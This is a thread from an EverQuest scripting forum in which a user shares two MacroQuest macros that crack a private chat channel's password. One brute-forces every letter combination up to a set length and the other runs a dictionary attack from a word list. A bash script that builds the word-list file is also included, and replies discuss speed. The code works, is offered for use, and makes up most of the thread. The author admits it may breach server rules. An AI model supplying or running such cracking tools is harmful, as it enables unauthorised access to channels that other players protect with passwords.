• You've discovered RedGuides, an EverQuest multi-boxing and scripting community 🧙‍♀️⚙️. We want you to play several EQ characters at once, come join us and say hello! 👋

  • A TLP without truebox has thawed (Very Vanilla ready)
    Frostreaver

BruteForce.Mac (Break Password on ChatChannel)

  • Thread starter Thread starter Ccomp5950
  • Start date Start date
C

Ccomp5950

I wrote this because someone had set a password to a channel that my guild uses. No one in guild knows the password but someone has it in there /autojoin. We think it's someone that is no longer in the guild but oh well.

I wanted to find the password out and couldn't find a macro that did this. I don't know if spamming the chat server with passwords will get you banned, I've done it on my spare account.

Obviously use at your own risk.

It changes what password it sends until it finds the one that works.

a
b
c
d
...
z
aa
ab
ac
ad
....
az
ba
bb
bc
....
zz
aaa
aab
aac

Usage: /mac Bruteforce "Channel_Name" Num_Characters_to_Stop_at
Example: /mac BruteForce "GUILDGROUP1" 8
will try and break into the channel Guildgroup1 and will stop after zzzzzzzz

It will display the correct password and then leave channel once it finds it.

By default it is set to only do lowercase letters if you want to add UPPERCASE and numbers you do so by typing them into the TestString Var

/declare TestString string outer abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789

The greater the length of the password and the greater the size of your teststring is the longer this is going to take.

Have fun.

I'm looking into adding dictionary attack using an INI

Rich (BB code): 
| Channel Brute Forcer, figure out the password for any channel.
| 
| BruteForce.mac by Ccomp5950
| With Thanks to Alatyami for Eyeballing it.
| Fuck private channels

#chat chat
#Event Wrong "#*#password for#*#"
#Event Debug "[MQ2] Debug"

#turbo 40

Sub Main(string parama,int paramb)
/declare Spam         int    outer 1
/declare Dbug         int    outer 1
/declare Channel      string outer ${parama}
/declare Length       int    outer ${paramb}
/declare TextString   string outer abcdefghijklmnopqrstuvwxyz
/declare Test	      string outer
/declare X            int    outer 0
/declare Y            int    outer 1
/declare Z            int    outer 0
/declare WaitTimer    timer  outer 5s
/declare Continue     int    outer 1
/declare Key[16]      int    outer 1
/declare ArrayLoop    int    outer 1
/declare ArrayLoopb    int    outer 2
/declare T	      int    outer 1
/declare TestBuild    string outer

/if (${Channel.Length}<2) /call no_param
/if (${Length}==0) /varset Length 8

/Echo Brute forcing Channel: ${Channel}
/Echo Using a maximum of ${Length} characters
/call Setup

|==============================
|Does First letter here
|==============================

/For Z 1 to ${TextString.Length}
		/varset Test ${TextString.Mid[${Z},1]}
		/if (${Spam}) /Echo Trying ${Test}
		/join ${Channel}:${Test}
		/varset WaitTimer 5s
		:waitloop
		/doevents
		/if (${WaitTimer}==0) /call WIN
		/if (${Continue}==0) /goto :waitloop
		/varset Continue 0
/next Z


/varset Key[1] 1

|================================
|Now doing 2nd, and (N)th letters
|================================
/varset Y 1
:BIGLOOP
		/For T 1 to ${TextString.Length}
			/call SetKey ${Y}
			/varset Test ${Test}${TextString.Mid[${T},1]}
			/if (${Spam}) /Echo Trying ${Test}
			/join ${Channel}:${Test}
			/varset WaitTimer 5s
			:waitloop2
			/doevents
			/if (${WaitTimer}==0) /call WIN
			/if (${Continue}==0) /goto :waitloop2
			/varset Continue 0
			/delay 0
		/next T
/call ChangeKey
/doevents
/goto :BigLoop
/return
	




Sub ChangeKey
/varcalc Key[${Y}] ${Key[${Y}]}+1
|============================================================
| Make sure the array's key position didn't just roll over
|============================================================
/for ArrayLoop ${Y} downto 1
/varcalc X ${ArrayLoop}-1
	/if (${Key[${ArrayLoop}]}>${TextString.Length}) {
		/if (${ArrayLoop}==1) /varcalc Y ${Y}+1
		/if (${ArrayLoop}>1) /varcalc Key[${X}] ${Key[${X}]}+1
		/varset Key[${ArrayLoop}] 1
		/if (${Key[${ArrayLoop}]}==1) /if (${Y}==${Length}) /call Lose
	}
/next ArrayLoop		
/return


Sub SetKey
/for ArrayLoopb 1 to ${Y}
	/if (${ArrayLoopb}==1) /varset Test ${TextString.Mid[${Key[1]},1]}
	/if (${ArrayLoopb}>1) /varset Test ${Test}${TextString.Mid[${Key[${ArrayLoopb}]},1]}
/next ArrayLoopb
/return

Sub Lose
/echo Password is either longer or you need to expand your test string
/echo to alpha numeric or include UPPERCASE letters
/endmac
/return

Sub no_param
/echo No Parameters were given
/echo Usage:  /mac Bruteforce "Channel_Name", Length_of_Password
/echo Example:  /mac Bruteforce "Guildofficers", 8
/endmac
/return

Sub WIN
/echo ==================
/echo PASSWORD CRACKED
/echo ==================
/echo Password for ${Channel} is ${Test}
/if (${Macro.RunTime}>60) /echo Time spent:  ${Math.Calc[${Float[${Macro.RunTime}/60]}].Int} Minutes
/if (${Macro.RunTime}<=60) /echo Time Spent: ${Macro.RunTime} Seconds
/leave ${Channel}
/endmac
/return

Sub Event_Wrong
/varset Continue 1
/doevents flush
/return

Sub Setup
/for X 1 to ${Length}
/varset Key[${X}] 1
/next X
/return

Sub Event_Debug
:yeah
/delay 5
/goto :yeah
/return
 
Dictionary attack with a valid ini inside the ZIP.

Usage: /mac dict "CHANNELNAME"
Example: /mac dict "GUILD2"

will work to break channel named GUILD2

Code: 
| Channel Brute Forcer, figure out the password for any channel.
| Using a word list to break a password
| Dict.mac by Ccomp5950
|
| Fuck private channels

#chat chat
#Event Wrong "#*#password for#*#"
#Event Debug "[MQ2] Debug"

#turbo 40

Sub Main(string parama,int paramb,string paramc
/declare Spam         int    outer 1
/declare Channel      string outer ${parama}
/declare WaitTimer    timer  outer 5s
/declare Continue     int    outer 1
/declare NumTries     int    outer 1
/declare Test         string outer 1
/declare Lines        int    outer 1

/if (${Channel.Length}<2) /call no_param
/varset Lines ${Int[${Ini["dict.ini","Admin","keynum"]}]}
:BigLoop
			/varset Test ${Ini[dict.ini,Words,"Key${NumTries}"]}
			/if (${Spam}) /Echo Trying ${Test} Try# ${NumTries}
			/join ${Channel}:${Test}
			/varset WaitTimer 5s
			:waitloop2
			/doevents
			/if (${WaitTimer}==0) /call WIN
			/if (${Continue}==0) /goto :waitloop2
			/varset Continue 0
			/varcalc NumTries ${NumTries}+1
			/if (${Lines}<${NumTries}) /call Lose
/goto :BigLoop
/return

Sub Lose
/echo Password is not a regular word
/echo Try using bruteforce.mac
/endmac
/return

Sub no_param
/echo No Parameters were given
/echo Usage:  /mac Dict "Channel_Name"
/echo Example:  /mac Dict "Guildofficers"
/endmac
/return

Sub WIN
/echo ==================
/echo PASSWORD CRACKED
/echo ==================
/echo Password for ${Channel} is ${Test}
/if (${Macro.RunTime}>60) /echo Time spent:  ${Math.Calc[${Float[${Macro.RunTime}/60]}].Int} Minutes
/if (${Macro.RunTime}<=60) /echo Time Spent: ${Macro.RunTime} Seconds
/leave ${Channel}
/endmac
/return

Sub Event_Wrong
/varset Continue 1
/doevents flush
/return
 
Last edited:
I used a Bash script (Linux) to format the INI quickly.

If you want to make your own dict.ini and make it quickly you can use this.

Remember you have to

Rich (BB code): 
chmod a+x Script

to make this execute from the commandline.

Code: 
#!/bin/bash
X=1
filename=$1
if [ "$1" = "" ]; then
filename = 3esl.txt
fi
echo "Reading $filename and processing, press ctrl-c to end"
lines=`sed -n $= $filename`
lines=`expr $lines - 1`
i=1
echo "[Admin]" > dict.ini
echo "keynum=$lines" >> dict.ini
echo "[Words]" >> dict.ini
while ((i <= lines))
do
readthisline=$i\p
line=`sed -n $readthisline $filename`
echo "key$i=$line" >> dict.ini
i=`expr $i + 1`
done
echo "**********************************"
echo "******** WORK COMPLETED **********"
echo "**********************************"
 
Last edited:
The bottleneck in all this is the servers responce about the password not being cool.

It had been suggested that you could use a plugin to do this quicker but I'm not sure how.

At 115ms server latancy you can do 5 tries per second.
 
Neat idea and nicely written, I can make a plugin to get rid of spam if you want?

-UnKnoWn
 
Ccomp5950 said:
The bottleneck in all this is the servers responce about the password not being cool.
Click to expand...

I didn't really thoroughly read this, after seeing that and the ${Spam} I assumed there would be spam. I know ${Spam} is only a declare but didn't read what it did, I just skimmed through it. In that case, nice job and never mind about the plugin ;)

-UnKnoWn
 
unknown405 said:
I didn't really thoroughly read this, after seeing that and the ${Spam} I assumed there would be spam. I know ${Spam} is only a declare but didn't read what it did, I just skimmed through it. In that case, nice job and never mind about the plugin ;)

-UnKnoWn
Click to expand...

Oh yeah, it's just for a more verbose macro it tells you what it's on instead of being all silent.
 
You must log in or register to reply here.
BruteForce.Mac (Break Password on ChatChannel)
Next unread thread 🦁

Users who are viewing this thread

Total: 1 (members: 0, guests: 1)
Back
Top
Cart

Cart

Total -